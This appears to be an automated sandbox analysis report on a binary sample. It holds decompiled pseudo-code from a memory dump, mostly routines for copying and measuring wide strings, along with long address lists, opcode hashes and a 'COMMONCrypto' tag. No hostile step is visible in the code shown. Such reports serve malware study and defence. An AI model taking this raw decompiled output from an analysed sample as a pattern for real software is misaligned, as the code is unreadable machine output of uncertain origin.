																			if(_t404 < _t433) {
																				continue;
																			}
																			break;
																		}
																		_t403 = _v24;
																		_t299 = _v40;
																	}
																	_t374 = 0;
																	_t403 = _t403 + 1;
																	 *_t231 = 0;
																	__eflags = _t403 -  *_v28;
																	if(_t403 >=  *_v28) {
																		L178:
																		_t386 = _a4;
																		 *_t386 = 0;
																		 *((intOrPtr*)(_t386 + 4)) = 0;
																		L46:
																		_t211 =  *_t299 & 0x0000ffff;
																		__eflags = _t211;
																		if(_t211 == 0) {
																			L80:
																			_push(0x80);
																			_t420 = E00411030();
																			_t446 = _t446 + 4;
																			_t205 =  *_a4;
																			__eflags = _t205;
																			if(_t205 == 0) {
																				__eflags = 0;
																				 *_t420 = 0;
																			} else {
																				__eflags = _t420;
																				if(_t420 != 0) {
																					_t354 =  *_t205 & 0x0000ffff;
																					 *_t420 = _t354;
																					__eflags = _t354;
																					if(_t354 != 0) {
																						_t355 = 0;
																						__eflags = 0;
																						while(1) {
																							_t355 = _t355 + 1;
																							_t319 =  *(_t205 + _t355 * 4 - 2) & 0x0000ffff;
																							 *(_t420 + _t355 * 4 - 2) = _t319;
																							__eflags = _t319;
																							if(_t319 == 0) {
																								goto L86;
																							}
																							_t320 =  *(_t205 + _t355 * 4) & 0x0000ffff;
																							 *(_t420 + _t355 * 4) = _t320;
																							__eflags = _t320;
																							if(_t320 != 0) {
																								continue;
																							}
																							goto L86;
																						}
																					}
																				}
																				L86:
																				_push(2);
																				_push(_t205);
																				E004110B0();
																				_t446 = _t446 + 8;
																			}
																			_t207 = _a4;
																			 *_t207 = _t420;
																			_t207[1] = 0x40;
																		} else {
																			_t357 = _t299 & 0x0000000f;
																			__eflags = _t357;
																			if(_t357 == 0) {
																				L52:
																				asm("pxor xmm0, xmm0");
																				_t401 =  ~( ~_t357 + 0x00000007 & 0x00000007) + 0x7fffffff;
																				__eflags = _t401;
																				while(1) {
																					asm("movdqu xmm1, [ebx+edx*2]");
																					asm("pcmpeqw xmm1, xmm0");
																					asm("pmovmskb eax, xmm1");
																					__eflags = _t211;
																					if(_t211 != 0) {
																						break;
																					}
																					_t357 = _t357 + 8;
																					__eflags = _t357 - _t401;
																					if(_t357 < _t401) {
																						continue;
																					} else {
																						__eflags = _t401 - 0x7fffffff;
																						if(_t401 >= 0x7fffffff) {
																							goto L58;
																						} else {
																							goto L56;
																						}
																					}
																					goto L59;
																				}
																				asm("bsf edi, eax");
																				_t401 = (_t401 >> 1) + _t357;
																			} else {
																				_t401 = 0;
																				__eflags = _t357 & 0x00000001;
																				if((_t357 & 0x00000001) != 0) {
																					while(1) {
																						L56:
																						__eflags =  *(_t299 + _t401 * 2) & 0x0000ffff;
																						if(( *(_t299 + _t401 * 2) & 0x0000ffff) == 0) {
																							goto L59;
																						}
																						_t401 = _t401 + 1;
																						__eflags = _t401 - 0x7fffffff;
																						if(_t401 < 0x7fffffff) {
																							continue;
																						} else {
																							L58:
																							_t401 = 0x7fffffff;
																						}
																						goto L59;
																					}
																				} else {
																					_t357 =  ~_t357 + 0x10 >> 1;
																					__eflags = _t357;
																					while(1) {
																						_t211 =  *(_t299 + _t401 * 2) & 0x0000ffff;
																						__eflags = _t211;
																						if(_t211 == 0) {
																							goto L59;
																						}
																						_t401 = _t401 + 1;
																						__eflags = _t401 - _t357;
																						if(_t401 < _t357) {
																							continue;
																						} else {
																							goto L52;
																						}
																						goto L59;
																					}
																				}
																			}
																			L59:
																			_t54 = _t401 + 1; // 0x80000000
																			_t358 = _t54;
																			__eflags = _t358 - 0x40;
																			_t359 =  <=  ? 0x40 : _t358;
																			__eflags = _t359;
																			if(_t359 > 0) {
																				_t217 = (_t359 >> 5 >> 0x1a) + _t359 >> 6;
																				_t360 = _t359 & 0x8000003f;
																				__eflags = _t360;
																				if(_t360 < 0) {
																					_t360 = (_t360 - 0x00000001 | 0xffffffc0) + 1;
																					__eflags = _t360;
																				}
																				__eflags = _t360;
																				_t218 = _t217 + (0 | _t360 > 0x00000000);
																				_push(_t218 << 7);
																				_t423 = _t218 << 6;
																				_t220 = E00411030();
																				_t446 = _t446 + 4;
																				_t321 =  *_a4;
																				__eflags = _t321;
																				if(_t321 == 0) {
																					__eflags = 0;
																					 *_t220 = 0;
																				} else {
																					__eflags = _t220;
																					if(_t220 != 0) {
																						_t368 =  *_t321 & 0x0000ffff;
																						 *_t220 = _t368;
																						__eflags = _t368;
																						if(_t368 != 0) {
																							_v40 = _t299;
																							_t369 = 0;
																							__eflags = 0;
																							while(1) {
																								_t369 = _t369 + 1;
																								_t301 =  *(_t321 + _t369 * 4 - 2) & 0x0000ffff;
																								 *(_t220 + _t369 * 4 - 2) = _t301;
																								__eflags = _t301;
																								if(_t301 == 0) {
																									break;
																								}
																								_t302 =  *(_t321 + _t369 * 4) & 0x0000ffff;
																								 *(_t220 + _t369 * 4) = _t302;
																								__eflags = _t302;
																								if(_t302 != 0) {
																									continue;
																								}
																								break;
																							}
																							_t299 = _v40;
																						}
																					}
																					_push(2);
																					_push(_t321);
																					_v52 = _t220;
																					E004110B0();
																					_t220 = _v52;
																					_t446 = _t446 + 8;
																				}
																				_t365 = _a4;
																				_t365[1] = _t423;
																				 *_t365 = _t220;
																			} else {
																				_t220 = 0;
																			}
																			_t366 = _t299;
																			__eflags = _t220;
																			if(_t220 != 0) {
																				_t322 = 0;
																				while(1) {
																					_t424 =  *_t366 & 0x0000ffff;
																					_t322 = _t322 + 1;
																					 *_t220 = _t424;
																					__eflags = _t401;
																					if(_t401 == 0) {
																						goto L78;
																					}
																					__eflags = _t322 - _t401;
																					if(_t322 == _t401) {
																						 *(_t220 + 2) = 0;
																					} else {
																						goto L78;
																					}
																					goto L89;
																					L78:
																					__eflags = _t424;
																					if(_t424 != 0) {
																						_t220 = _t220 + 2;
																						_t366 = _t366 + 2;
																						__eflags = _t366;
																						continue;
																					}
																					goto L89;
																				}
																			}
																		}
																	} else {
																		__eflags = _a8 & 0x0000ffff;
																		if((_a8 & 0x0000ffff) == 0) {
																			continue;
																		} else {
																			goto L151;
																		}
																		goto L198;
																	}
																}
															}
														}
													}
												} else {
													L43:
													_t223 = _a8 & 0x0000ffff;
													_t419 = _v28;
													goto L44;
												}
												goto L89;
											}
											_t419 = _t224;
											_t223 = _a8 & 0x0000ffff;
											goto L44;
										}
										goto L41;
										L44:
										_t403 = _t403 + 1;
										__eflags = _t403 -  *_t419;
									} while (_t403 <  *_t419);
									goto L45;
								}
							}
						}
					}
					L89:
					_push(2);
					_push(_t299);
					E004110B0();
					return _a4;
				} else {
					_t292 = _a4;
					_t314 = 0;
					_push(0x80);
					 *_t292 = 0;
					 *((intOrPtr*)(_t292 + 4)) = 0;
					_t442 = E00411030();
					_t448 = _t446 + 4;
					_t295 =  *_a4;
					if(_t295 == 0) {
						 *_t442 = 0;
					} else {
						if(_t442 != 0) {
							_t391 =  *_t295 & 0x0000ffff;
							 *_t442 = _t391;
							if(_t391 != 0) {
								while(1) {
									_t314 = _t314 + 1;
									_t392 =  *(_t295 + _t314 * 4 - 2) & 0x0000ffff;
									 *(_t442 + _t314 * 4 - 2) = _t392;
									if(_t392 == 0) {
										goto L6;
									}
									_t393 =  *(_t295 + _t314 * 4) & 0x0000ffff;
									_t442[_t314] = _t393;
									if(_t393 != 0) {
										continue;
									}
									goto L6;
								}
							}
						}
						L6:
						_push(2);
						_push(_t295);
						E004110B0();
						_t448 = _t448 + 8;
					}
					_t296 = _a4;
					_t296[1] = 0x40;
					 *_t296 = _t442;
					return _t296;
				}
				L198:
			}

0x004289f8
0x004289f9
0x004289fc
0x004289fe
0x00428a02
0x00428a7c
0x00428a7e
0x00428a80
0x00428bb5
0x00428bb5
0x00428bbf
0x00428bc1
0x00428bc6
0x00428bc9
0x00428bcc
0x00000000
0x00428bce
0x00428bce
0x00000000
0x00428bce
0x00428a86
0x00428a89
0x00428a8b
0x00000000
0x00428a91
0x00428a93
0x00428a93
0x00428a96
0x00428ab2
0x00428ab6
0x00428ac2
0x00428ac2
0x00428ac8
0x00428ac8
0x00428acd
0x00428ad1
0x00428ad5
0x00428ad7
0x00000000
0x00000000
0x00428add
0x00428ae0
0x00428ae2
0x00000000
0x00428ae4
0x00428ae4
0x00428aea
0x00000000
0x00000000
0x00000000
0x00000000
0x00428aea
0x00000000
0x00428ae2
0x004291f2
0x004291f7
0x00428a98
0x00428a98
0x00428a9a
0x00428a9c
0x00428aec
0x00428aec
0x00428af0
0x00428af2
0x00000000
0x00000000
0x00428af4
0x00428af5
0x00428afb
0x00000000
0x00428afd
0x00428afd
0x00428afd
0x00428afd
0x00000000
0x00428afb
0x00428a9e
0x00428aa3
0x00428aa3
0x00428aa5
0x00428aa5
0x00428aa9
0x00428aab
0x00000000
0x00000000
0x00428aad
0x00428aae
0x00428ab0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00428ab0
0x00428aa5
0x00428a9c
0x00428b02
0x00428b07
0x00428b07
0x00428b0a
0x00428b0d
0x00428b10
0x00428b12
0x00428b30
0x00428b33
0x00428b33
0x00428b38
0x00428b40
0x00428b40
0x00428b40
0x00428b41
0x00428b4b
0x00428b55
0x00428b56
0x00428b5a
0x00428b5e
0x00428b63
0x00428b67
0x00428b6b
0x00428b6f
0x00428b74
0x00428b78
0x00428b7c
0x00428b81
0x00428b85
0x00428b88
0x00428b8c
0x00428b98
0x00428b98
0x00428b9b
0x00428b9c
0x00428b9f
0x00428ba1
0x00000000
0x00000000
0x00428ba3
0x00428ba5
0x004291b6
0x004291ba
0x004291be
0x004291c2
0x004291c5
0x004291c9
0x00000000
0x00000000
0x00000000
0x004291cd
0x004291cd
0x004291d0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00428bab
0x00428bab
0x00428bad
0x004291e5
0x004291e9
0x004291ec
0x00428bb3
0x00428b92
0x00428b95
0x00428b95
0x00000000
0x00428b95
0x00000000
0x00428bad
0x00428b14
0x00428b14
0x00428b16
0x00428b19
0x00428c29
0x00428c29
0x00428c2e
0x00428c30
0x00428c33
0x00428c35
0x00000000
0x00000000
0x00000000
0x00000000
0x00428b1f
0x00428b1f
0x00428bd3
0x00428bd3
0x00428bd7
0x00428bdc
0x00428be0
0x00428be4
0x00428be4
0x00428be6
0x00428bf9
0x00428be8
0x00428be8
0x00428bea
0x004291fe
0x00429202
0x00429202
0x00428bf0
0x00428bf0
0x0042908a
0x0042908c
0x0042908c
0x0042908f
0x004290af
0x004290b3
0x004290bf
0x004290bf
0x004290c5
0x004290c5
0x004290ca
0x004290ce
0x004290d2
0x004290d4
0x00000000
0x00000000
0x004290da
0x004290dd
0x004290df
0x00000000
0x004290e1
0x004290e1
0x004290e7
0x00000000
0x00000000
0x00000000
0x00000000
0x004290e7
0x00000000
0x004290df
0x0042926c
0x00429271
0x00000000
0x00429091
0x00429091
0x00429093
0x00429095
0x004290e9
0x004290e9
0x004290ed
0x004290ef
0x00000000
0x00000000
0x004290f5
0x004290f6
0x004290fc
0x00000000
0x004290fe
0x004290fe
0x004290fe
0x004290fe
0x00000000
0x004290fc
0x00000000
0x00429097
0x0042909c
0x0042909c
0x0042909e
0x0042909e
0x004290a2
0x004290a4
0x00000000
0x00000000
0x004290aa
0x004290ab
0x004290ad
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004290ad
0x00429259
0x00429259
0x0042925c
0x00429264
0x00429264
0x0042925c
0x00429095
0x0042908f
0x00429103
0x00429108
0x00429108
0x0042910b
0x0042910e
0x00429111
0x00429115
0x00429125
0x00429128
0x00429128
0x0042912e
0x00429136
0x00429136
0x00429136
0x00429139
0x0042913e
0x00429148
0x0042914c
0x00429152
0x00429154
0x00429157
0x00429159
0x0042919b
0x0042919d
0x0042915b
0x0042915b
0x0042915d
0x0042915f
0x00429162
0x00429165
0x00429167
0x00429169
0x00429169
0x0042916b
0x0042916b
0x0042916c
0x00429171
0x00429176
0x00429178
0x00000000
0x00000000
0x0042917a
0x0042917e
0x00429182
0x00429184
0x00000000
0x00000000
0x00000000
0x00429184
0x0042916b
0x00429167
0x00429186
0x00429186
0x00429188
0x00429189
0x0042918d
0x00429192
0x00429196
0x00429196
0x004291a0
0x004291a0
0x004291a8
0x004291ac
0x00428bfd
0x00428bfd
0x00428bfd
0x00428c04
0x00428c07
0x00428c09
0x00428c0b
0x00000000
0x00000000
0x00428c14
0x00428c16
0x00428e0d
0x00428e0f
0x00000000
0x00428e15
0x00428e17
0x00428e17
0x00428e1a
0x00428e36
0x00428e3a
0x00428e46
0x00428e46
0x00428e4c
0x00428e4c
0x00428e51
0x00428e55
0x00428e59
0x00428e5b
0x00000000
0x00000000
0x00428e61
0x00428e64
0x00428e66
0x00000000
0x00428e68
0x00428e68
0x00428e6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00428e6e
0x00000000
0x00428e66
0x0042928e
0x00429293
0x00428e1c
0x00428e1c
0x00428e1e
0x00428e20
0x00428e70
0x00428e70
0x00428e74
0x00428e76
0x00000000
0x00000000
0x00428e78
0x00428e79
0x00428e7f
0x00000000
0x00428e81
0x00428e81
0x00428e81
0x00428e81
0x00000000
0x00428e7f
0x00428e22
0x00428e27
0x00428e27
0x00428e29
0x00428e29
0x00428e2d
0x00428e2f
0x00000000
0x00000000
0x00428e31
0x00428e32
0x00428e34
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00428e34
0x00428e29
0x00428e20
0x00428e86
0x00428e86
0x00428e88
0x00429287
0x00428e8e
0x00428e90
0x00428e90
0x00428e93
0x00428ebc
0x00428ec0
0x00428ecc
0x00428ed0
0x00428ed0
0x00428ed5
0x00428ed5
0x00428eda
0x00428ede
0x00428ee2
0x00428ee4
0x00000000
0x00000000
0x00428eea
0x00428eed
0x00428eef
0x00000000
0x00428ef1
0x00428ef1
0x00428ef5
0x00428efa
0x00000000
0x00000000
0x00000000
0x00000000
0x00428efa
0x00000000
0x00428eef
0x00429277
0x0042927a
0x0042927c
0x00429280
0x00428e95
0x00428e95
0x00428e97
0x00428e9a
0x00428efc
0x00428efc
0x00428f00
0x00428f02
0x00000000
0x00000000
0x00428f04
0x00428f05
0x00428f0a
0x00000000
0x00428f0c
0x00428f0c
0x00428f0c
0x00428f0c
0x00000000
0x00428f0a
0x00428e9c
0x00428ea1
0x00428ea1
0x00428ea3
0x00428ea7
0x00428eab
0x00428ead
0x00000000
0x00000000
0x00428eb3
0x00428eb4
0x00428eb6
0x00000000
0x00428eb8
0x00428eb8
0x00000000
0x00428eb8
0x00000000
0x00428eb6
0x00429220
0x00429220
0x00428e9a
0x00428e93
0x00428f11
0x00428f11
0x00428f11
0x00428f15
0x00428f17
0x00428f40
0x00428f43
0x00428f46
0x00428f4a
0x00000000
0x00000000
0x00000000
0x00428f19
0x00428f19
0x00428f1b
0x00429229
0x0042922e
0x00000000
0x00000000
0x00000000
0x00000000
0x00428f21
0x00428f21
0x00428f23
0x00428f26
0x00428f2b
0x00428f34
0x00428f34
0x00428f50
0x00428f5a
0x00428f5d
0x00428f5d
0x00428f62
0x00428f6a
0x00428f6a
0x00428f6a
0x00428f6b
0x00428f75
0x00428f7f
0x00428f83
0x00428f84
0x00428f88
0x00428f8d
0x00428f91
0x00428f93
0x00428f96
0x00428f98
0x00428fea
0x00428fec
0x00428f9a
0x00428f9a
0x00428f9c
0x00428f9e
0x00428fa1
0x00428fa4
0x00428fa6
0x00428fa8
0x00428fac
0x00428fac
0x00428fae
0x00428fae
0x00428faf
0x00428fb4
0x00428fb9
0x00428fbb
0x00000000
0x00000000
0x00428fbd
0x00428fc1
0x00428fc5
0x00428fc7
0x00000000
0x00000000
0x00000000
0x00428fc7
0x00428fc9
0x00428fc9
0x00428fa6
0x00428fcd
0x00428fcf
0x00428fd0
0x00428fd4
0x00428fd8
0x00428fdd
0x00428fe1
0x00428fe5
0x00428fe5
0x00428fef
0x00428ff1
0x00428ff1
0x00428ff3
0x00428ff5
0x00429234
0x00429238
0x00429239
0x0042923b
0x0042924a
0x0042924f
0x00429251
0x00000000
0x0042923d
0x00429241
0x00429243
0x00000000
0x00429245
0x00000000
0x00429245
0x00000000
0x00429243
0x00428ffb
0x00428ffb
0x00000000
0x00428ffb
0x00428f2d
0x00428f2d
0x00428ffe
0x00428ffe
0x00429000
0x00429002
0x00429006
0x00429006
0x00429008
0x0042900c
0x0042900c
0x0042900d
0x00429014
0x00429017
0x00429019
0x00000000
0x00000000
0x0042901e
0x00429020
0x00429022
0x00000000
0x00000000
0x00000000
0x00429022
0x00429024
0x00429028
0x00429028
0x0042902c
0x0042902e
0x00429030
0x00429039
0x00000000
0x00000000
0x00429032
0x00429032
0x0042903b
0x0042903b
0x00429043
0x00429047
0x0042904b
0x0042904f
0x0042904f
0x00429053
0x00429057
0x00429059
0x00000000
0x00000000
0x0042905b
0x0042905b
0x0042905f
0x00429060
0x00429062
0x00000000
0x00000000
0x00000000
0x00429062
0x00429064
0x00429068
0x00429068
0x0042906c
0x0042906e
0x0042906f
0x00429076
0x00429078
0x004291d6
0x004291d6
0x004291db
0x004291dd
0x00428c3b
0x00428c3b
0x00428c3e
0x00428c40
0x00428d95
0x00428d95
0x00428d9f
0x00428da1
0x00428da7
0x00428da9
0x00428dab
0x00428de5
0x00428de7
0x00428dad
0x00428dad
0x00428daf
0x00428db1
0x00428db4
0x00428db7
0x00428db9
0x00428dbb
0x00428dbb
0x00428dbd
0x00428dbd
0x00428dbe
0x00428dc3
0x00428dc8
0x00428dca
0x00000000
0x00000000
0x00428dcc
0x00428dd0
0x00428dd4
0x00428dd6
0x00000000
0x00000000
0x00000000
0x00428dd6
0x00428dbd
0x00428db9
0x00428dd8
0x00428dd8
0x00428dda
0x00428ddb
0x00428de0
0x00428de0
0x00428dea
0x00428ded
0x00428def
0x00428c46
0x00428c48
0x00428c48
0x00428c4b
0x00428c68
0x00428c6c
0x00428c78
0x00428c78
0x00428c7e
0x00428c7e
0x00428c83
0x00428c87
0x00428c8b
0x00428c8d
0x00000000
0x00000000
0x00428c93
0x00428c96
0x00428c98
0x00000000
0x00428c9a
0x00428c9a
0x00428ca0
0x00000000
0x00000000
0x00000000
0x00000000
0x00428ca0
0x00000000
0x00428c98
0x00429214
0x00429219
0x00428c4d
0x00428c4d
0x00428c4f
0x00428c52
0x00428ca2
0x00428ca2
0x00428ca6
0x00428ca8
0x00000000
0x00000000
0x00428caa
0x00428cab
0x00428cb1
0x00000000
0x00428cb3
0x00428cb3
0x00428cb3
0x00428cb3
0x00000000
0x00428cb1
0x00428c54
0x00428c59
0x00428c59
0x00428c5b
0x00428c5b
0x00428c5f
0x00428c61
0x00000000
0x00000000
0x00428c63
0x00428c64
0x00428c66
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00428c66
0x00428c5b
0x00428c52
0x00428cb8
0x00428cbd
0x00428cbd
0x00428cc0
0x00428cc3
0x00428cc6
0x00428cc8
0x00428cdb
0x00428cde
0x00428cde
0x00428ce4
0x00428cec
0x00428cec
0x00428cec
0x00428ced
0x00428cf7
0x00428cfe
0x00428cff
0x00428d02
0x00428d07
0x00428d0d
0x00428d0f
0x00428d11
0x00428d5b
0x00428d5d
0x00428d13
0x00428d13
0x00428d15
0x00428d17
0x00428d1a
0x00428d1d
0x00428d1f
0x00428d21
0x00428d25
0x00428d25
0x00428d27
0x00428d27
0x00428d28
0x00428d2d
0x00428d32
0x00428d34
0x00000000
0x00000000
0x00428d36
0x00428d3a
0x00428d3e
0x00428d40
0x00000000
0x00000000
0x00000000
0x00428d40
0x00428d42
0x00428d42
0x00428d1f
0x00428d46
0x00428d48
0x00428d49
0x00428d4d
0x00428d52
0x00428d56
0x00428d56
0x00428d60
0x00428d63
0x00428d66
0x00428cca
0x00428cca
0x00428cca
0x00428d68
0x00428d6a
0x00428d6c
0x00428d72
0x00428d7c
0x00428d7c
0x00428d7f
0x00428d80
0x00428d83
0x00428d85
0x00000000
0x00000000
0x00428d87
0x00428d89
0x0042920b
0x00000000
0x00000000
0x00000000
0x00000000
0x00428d8f
0x00428d8f
0x00428d91
0x00428d76
0x00428d79
0x00428d79
0x00000000
0x00428d79
0x00000000
0x00428d91
0x00428d7c
0x00428d6c
0x0042907e
0x00429082
0x00429084
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00429084
0x00429078
0x00428f2b
0x00428f1b
0x00428f17
0x00428c1c
0x00428c1c
0x00428c1c
0x00428c20
0x00000000
0x00428c20
0x00000000
0x00428c16
0x0042929a
0x0042929c
0x00000000
0x0042929c
0x00000000
0x00428c24
0x00428c24
0x00428c25
0x00428c25
0x00000000
0x00428be4
0x00428b19
0x00428b12
0x00428a8b
0x00428df6
0x00428df6
0x00428df8
0x00428df9
0x00428e0a
0x00428a04
0x00428a04
0x00428a07
0x00428a09
0x00428a0e
0x00428a10
0x00428a18
0x00428a1a
0x00428a20
0x00428a24
0x00428a5c
0x00428a26
0x00428a28
0x00428a2a
0x00428a2d
0x00428a32
0x00428a34
0x00428a34
0x00428a35
0x00428a3a
0x00428a41
0x00000000
0x00000000
0x00428a43
0x00428a47
0x00428a4d
0x00000000
0x00000000
0x00000000
0x00428a4d
0x00428a34
0x00428a32
0x00428a4f
0x00428a4f
0x00428a51
0x00428a52
0x00428a57
0x00428a57
0x00428a5f
0x00428a62
0x00428a69
0x00428a74
0x00428a74
0x00000000

Strings

@, xrefs: 00429229

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 890d090df5082a30348e5f74619d74015760cc1c72b8607f5a6b626b3c49c3ad
Instruction ID: 4bb416f98a0d1feee8838395077162a4cf84d7332d27eacc2eb92db408d64f9e
Opcode Fuzzy Hash: 890d090df5082a30348e5f74619d74015760cc1c72b8607f5a6b626b3c49c3ad
Instruction Fuzzy Hash: 8442D471B153328AD7248F29D44123B72E2AFD5350FA9862FE895CB395EF38CC418399

Uniqueness

Uniqueness Score: -1.00%

Function 0041AE80, Relevance: 2.0, Strings: 1, Instructions: 719
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0041AE80(intOrPtr* __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* __esi;
				signed short* _t229;
				unsigned int _t237;
				signed int _t238;
				signed short** _t243;
				signed short* _t244;
				signed short* _t248;
				signed int* _t250;
				signed int _t255;
				signed int _t259;
				signed int _t264;
				signed int _t268;
				signed int _t271;
				unsigned int _t277;
				signed int _t278;
				void* _t284;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				signed short* _t298;
				signed int _t301;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed short* _t334;
				signed int _t336;
				signed int _t337;
				signed int _t339;
				signed int _t346;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t374;
				signed int _t377;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				void* _t385;
				signed int _t386;
				signed int _t387;
				signed int _t390;
				intOrPtr* _t392;
				signed int _t393;
				signed int _t394;
				intOrPtr* _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t403;
				signed int _t404;
				signed int _t405;
				void* _t406;
				signed int _t407;
				signed int _t408;
				signed short* _t411;
				signed int* _t412;
				signed int _t413;
				signed int _t417;
				intOrPtr* _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t441;
				signed int _t443;
				signed int _t448;
				signed int _t449;
				signed int _t452;
				signed int _t455;
				intOrPtr* _t458;
				signed int _t460;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				unsigned int _t465;
				unsigned int _t466;
				signed int _t467;
				unsigned int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				void* _t481;

				_v64 = 0;
				_t458 = __ecx;
				_v60 = 0;
				_push(0x80);
				_t441 = E00411030();
				_t481 = (_t478 & 0xfffffff0) - 0x34 + 4;
				_t229 = _v64;
				if(_t229 == 0) {
					__eflags = 0;
					 *_t441 = 0;
				} else {
					if(_t441 != 0) {
						_t384 =  *_t229 & 0x0000ffff;
						 *_t441 = _t384;
						if(_t384 != 0) {
							while(1) {
								_t384 = 1;
								_t382 = _t229[1] & 0x0000ffff;
								 *(_t441 + 2) = _t382;
								if(_t382 == 0) {
									goto L6;
								}
								_t383 = _t229[2] & 0x0000ffff;
								 *(_t441 + 4) = _t383;
								if(_t383 != 0) {
									continue;
								}
								goto L6;
							}
						}
					}
					L6:
					_push(2);
					_push(_t229);
					E004110B0();
					_t481 = _t481 + 8;
				}
				_v60 = 0x40;
				_v64 = _t441;
				if((_a8 & 0x0000ffff) != 0) {
					__eflags = _t441;
					if(_t441 == 0) {
						_t349 = 0x40;
						_t316 = 0;
					} else {
						_t309 = _t441 & 0x0000000f;
						__eflags = _t309;
						if(_t309 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t346 =  ~( ~_t309 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t346;
							while(1) {
								asm("movdqu xmm1, [edi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb edx, xmm1");
								__eflags = _t384;
								if(_t384 != 0) {
									break;
								}
								_t309 = _t309 + 8;
								__eflags = _t309 - _t346;
								if(_t309 < _t346) {
									continue;
								} else {
									__eflags = _t346 - 0x7fffffff;
									if(_t346 >= 0x7fffffff) {
										goto L22;
									} else {
										goto L20;
									}
								}
								goto L23;
							}
							asm("bsf ebx, edx");
							_t316 = (_t346 >> 1) + _t309;
							goto L126;
						} else {
							_t346 = 0;
							__eflags = _t309 & 0x00000001;
							if((_t309 & 0x00000001) != 0) {
								while(1) {
									L20:
									__eflags =  *(_t441 + _t346 * 2) & 0x0000ffff;
									if(( *(_t441 + _t346 * 2) & 0x0000ffff) == 0) {
										goto L126;
									}
									_t346 = _t346 + 1;
									__eflags = _t346 - 0x7fffffff;
									if(_t346 < 0x7fffffff) {
										continue;
									} else {
										L22:
										_t349 = 0x40;
										_t316 = 0x7fffffff;
									}
									goto L23;
								}
								goto L126;
							} else {
								_t309 =  ~_t309 + 0x10 >> 1;
								__eflags = _t309;
								while(1) {
									_t384 =  *(_t441 + _t346 * 2) & 0x0000ffff;
									__eflags = _t384;
									if(_t384 == 0) {
										break;
									}
									_t346 = _t346 + 1;
									__eflags = _t346 - _t309;
									if(_t346 < _t309) {
										continue;
									} else {
										goto L16;
									}
									goto L23;
								}
								L126:
								__eflags = _t316 - 0xfffffffe;
								if(_t316 != 0xfffffffe) {
									_t349 = 0x40;
								} else {
									 *_t441 = 0;
									_t349 = _v60;
								}
							}
						}
					}
					L23:
					_t24 = _t316 + 2; // -2147483652
					_t385 = _t24;
					__eflags = _t385 - 0x40;
					_t386 =  <=  ? 0x40 : _t385;
					__eflags = _t349 - _t386;
					if(_t349 < _t386) {
						_t237 = (_t386 >> 5 >> 0x1a) + _t386 >> 6;
						_t387 = _t386 & 0x8000003f;
						__eflags = _t387;
						if(_t387 < 0) {
							_t387 = (_t387 - 0x00000001 | 0xffffffc0) + 1;
							__eflags = _t387;
						}
						__eflags = _t387;
						_t238 = _t237 + (0 | _t387 > 0x00000000);
						_push(_t238 << 7);
						_t443 = _t238 << 6;
						_t390 = E00411030();
						_t481 = _t481 + 4;
						_t350 = _v64;
						__eflags = _t350;
						if(_t350 == 0) {
							__eflags = 0;
							 *_t390 = 0;
						} else {
							__eflags = _t390;
							if(_t390 != 0) {
								_t306 =  *_t350 & 0x0000ffff;
								 *_t390 = _t306;
								__eflags = _t306;
								if(_t306 != 0) {
									_v68 = _t458;
									_t307 = 0;
									__eflags = 0;
									while(1) {
										_t307 = _t307 + 1;
										_t476 =  *(_t350 + _t307 * 4 - 2) & 0x0000ffff;
										 *(_t390 + _t307 * 4 - 2) = _t476;
										__eflags = _t476;
										if(_t476 == 0) {
											break;
										}
										_t477 =  *(_t350 + _t307 * 4) & 0x0000ffff;
										 *(_t390 + _t307 * 4) = _t477;
										__eflags = _t477;
										if(_t477 != 0) {
											continue;
										}
										break;
									}
									_t458 = _v68;
								}
							}
							_push(2);
							_push(_t350);
							_v68 = _t390;
							E004110B0();
							_t390 = _v68;
							_t481 = _t481 + 8;
						}
						_v60 = _t443;
						_v64 = _t390;
					} else {
						_t390 = _v64;
					}
					 *((short*)(_t390 + _t316 * 2)) = _a8 & 0x0000ffff;
					__eflags = 0;
					_t243 =  &_v64;
					 *((short*)(_v64 + 2 + _t316 * 2)) = 0;
				} else {
					_t243 =  &_v64;
				}
				_t244 =  *_t243;
				_v28 = _t244;
				if(_t244 == 0) {
					L40:
					_t392 = _a4;
					_push(0x80);
					 *_t392 = 0;
					 *((intOrPtr*)(_t392 + 4)) = 0;
					_t317 = E00411030();
					_t481 = _t481 + 4;
					_t248 =  *_a4;
					if(_t248 == 0) {
						 *_t317 = 0;
					} else {
						if(_t317 != 0) {
							_t393 =  *_t248 & 0x0000ffff;
							 *_t317 = _t393;
							if(_t393 != 0) {
								_t394 = 0;
								while(1) {
									_t394 = _t394 + 1;
									_t352 =  *(_t248 + _t394 * 4 - 2) & 0x0000ffff;
